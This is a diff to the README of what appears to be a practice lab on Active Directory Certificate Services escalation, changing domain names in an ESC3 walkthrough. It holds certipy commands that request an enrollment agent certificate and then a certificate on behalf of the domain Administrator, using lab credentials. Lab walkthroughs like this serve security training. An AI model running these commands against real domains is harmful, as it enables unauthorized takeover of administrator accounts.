Sodanew/Practice-AD-CS-Domain-Escalation/README.md

 First, we must request a certificate based on the certificate template vulnerable to ESC3.

-`certipy req -u s.jackson@certipied.local -p 'Pr3-0wn3d@#.' -ca Certipied-CA  -template Vuln-ESC3-1 -dc-ip 192.168.91.185`
+`certipy req -u s.jackson@gamers.com -p 'Pr3-0wn3d@#.' -ca gamers-CA  -template Vuln-ESC3-1 -dc-ip 192.168.91.185`

 ![](/screenshots/2023-09-03_21-39.png?raw=true)

 We can then use the Certificate Request Agent certificate (`-pfx`) to request a certificate on behalf of another user by specifying the `-on-behalf-of` flag.
-The `-on-behalf-of` parameter value must be in the form of `domain\user`, and not the FQDN of the domain, i.e. `certipied` rather than `certipied.local`.
+The `-on-behalf-of` parameter value must be in the form of `domain\user`, and not the FQDN of the domain, i.e. `gamers` rather than `gamers.com`.

-`certipy req -u s.jackson@certipied.local -p 'Pr3-0wn3d@#.' -ca Certipied-CA  -template User -on-behalf-of 'certipied\Administrator' -pfx s.jackson.pfx -dc-ip 192.168.91.185`
+`certipy req -u s.jackson@gamers.com -p 'Pr3-0wn3d@#.' -ca gamers-CA  -template User -on-behalf-of 'gamers\Administrator' -pfx s.jackson.pfx -dc-ip 192.168.91.185`

 ![](/screenshots/2023-09-03_21-41.png?raw=true)